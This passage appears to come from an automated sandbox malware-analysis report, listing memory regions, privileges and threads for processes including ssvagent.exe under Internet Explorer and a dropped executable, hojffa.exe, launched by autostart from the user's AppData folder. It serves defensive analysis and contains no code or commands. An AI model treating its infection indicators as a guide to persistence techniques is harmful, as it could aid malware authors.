pagefile_0x0000000000750000 0x00750000 0x008d0fff Pagefile Backed Memory Readable True False False -
index.dat 0x008e0000 0x008ebfff Memory Mapped File Readable, Writable True False False -
private_0x00000000008f0000 0x008f0000 0x009effff Private Memory Readable, Writable True False False -
pagefile_0x00000000009f0000 0x009f0000 0x01deffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False -
pagefile_0x00000000020c0000 0x020c0000 0x0212dfff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x02130000 0x02137fff Memory Mapped File Readable, Writable True False False -
index.dat 0x02140000 0x0214ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000002150000 0x02150000 0x02150fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002160000 0x02160000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
private_0x00000000021e0000 0x021e0000 0x021fffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002300000 0x02300000 0x02300fff Pagefile Backed Memory Readable True False False -
private_0x0000000002310000 0x02310000 0x02311fff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable True False False -
private_0x0000000002360000 0x02360000 0x0245ffff Private Memory Readable, Writable True False False -
private_0x0000000002480000 0x02480000 0x0257ffff Private Memory Readable, Writable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x0000000002600000 0x02600000 0x0263ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002760000 0x02760000 0x0279ffff Private Memory Readable, Writable True False False -
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x0298ffff Private Memory Readable, Writable True False False -
private_0x00000000029d0000 0x029d0000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02c1ffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cbffff Private Memory Readable, Writable True False False -
private_0x0000000002db0000 0x02db0000 0x02eaffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002eb0000 0x02eb0000 0x032a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000032b0000 0x032b0000 0x033affff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x0354ffff Private Memory Readable, Writable True False False -
private_0x0000000003630000 0x03630000 0x0366ffff Private Memory Readable, Writable True False False -
private_0x0000000003770000 0x03770000 0x037affff Private Memory Readable, Writable True False False -
staticcache.dat 0x037b0000 0x040dffff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
comctl32.dll 0x71a50000 0x71ad3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x71ae0000 0x71b6dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x71b70000 0x71c12fff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x71c20000 0x71c30fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x71c40000 0x71c6dfff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x72e00000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73d60000 0x73dabfff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73d70000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x73db0000 0x73de4fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x74320000 0x74414fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x74a10000 0x74a3afff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x74c90000 0x74ca1fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75210000 0x7528afff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75290000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75860000 0x75886fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 43 entries are omitted.
The remaining entries can be found in flog.txt.
Process #15: ssvagent.exe
Information Value
ID #15
File Name c:\progra~2\java\jre7\bin\ssvagent.exe
Command Line "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:39
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xa20
Parent PID 0x49c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0x8DC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory Readable, Writable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
private_0x0000000000950000 0x00950000 0x0095ffff Private Memory Readable, Writable True False False -
private_0x0000000000a20000 0x00a20000 0x00a2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x00a30000 0x00cfefff Memory Mapped File Readable False False False -
private_0x0000000000ed0000 0x00ed0000 0x00f0ffff Private Memory Readable, Writable True False False -
ssvagent.exe 0x01380000 0x0138cfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
deploy.dll 0x71710000 0x7176dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x717d0000 0x7188efff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x71890000 0x718bdfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
imagehlp.dll 0x74eb0000 0x74ed9fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #25: hojffa.exe
1253 35
Information Value
ID #25
File Name c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe
Command Line "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe"
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:03, Reason: Autostart
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:17
OS Process Information
Information Value
PID 0x7cc
Parent PID 0x7b4 (c:\windows\system32\conhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x7D0
0x7D4
0x7DC
0x7E4
0x7E8
0x7EC
0x7F0
0x7F4
0x7F8
0x420
0x5F0
0x628
0x67C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00064fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00076fff Pagefile Backed Memory Readable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00091fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00144fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00154fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00160000 0x00160fff Memory Mapped File Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
index.dat 0x00180000 0x0018bfff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0022afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x00256fff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x00246fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000250000 0x00250000 0x00250fff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x00260fff Private Memory Readable, Writable, Executable True False False -
index.dat 0x00260000 0x00267fff Memory Mapped File Readable, Writable True True False
index.dat 0x00270000 0x0027ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x00292fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0035ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False -
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003a2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
hojffa.exe 0x00400000 0x00448fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000450000 0x00450000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x004d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x004e0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d70000 0x01d70000 0x01e6ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01e70000 0x0213efff Memory Mapped File Readable False False False -
pagefile_0x0000000002140000 0x02140000 0x02532fff Pagefile Backed Memory Readable True False False -
private_0x0000000002540000 0x02540000 0x0263ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x026cffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0267ffff Private Memory Readable, Writable True False False -
private_0x0000000002700000 0x02700000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002740000 0x02740000 0x0283ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0293ffff Private Memory Readable, Writable True False False -
private_0x0000000002940000 0x02940000 0x02a3ffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02beffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02b3ffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02beffff Private Memory Readable, Writable True False False -
private_0x0000000002bf0000 0x02bf0000 0x02ceffff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02deffff Private Memory Readable, Writable True False False -
pidor.bmp 0x03f10000 0x04401fff Memory Mapped File Readable True True False
netprofm.dll 0x73700000 0x73759fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x73780000 0x7378cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x73790000 0x737a4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x737b0000 0x73801fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73890000 0x738a6fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73910000 0x739cefff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x739d0000 0x739d2fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x75590000 0x75592fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
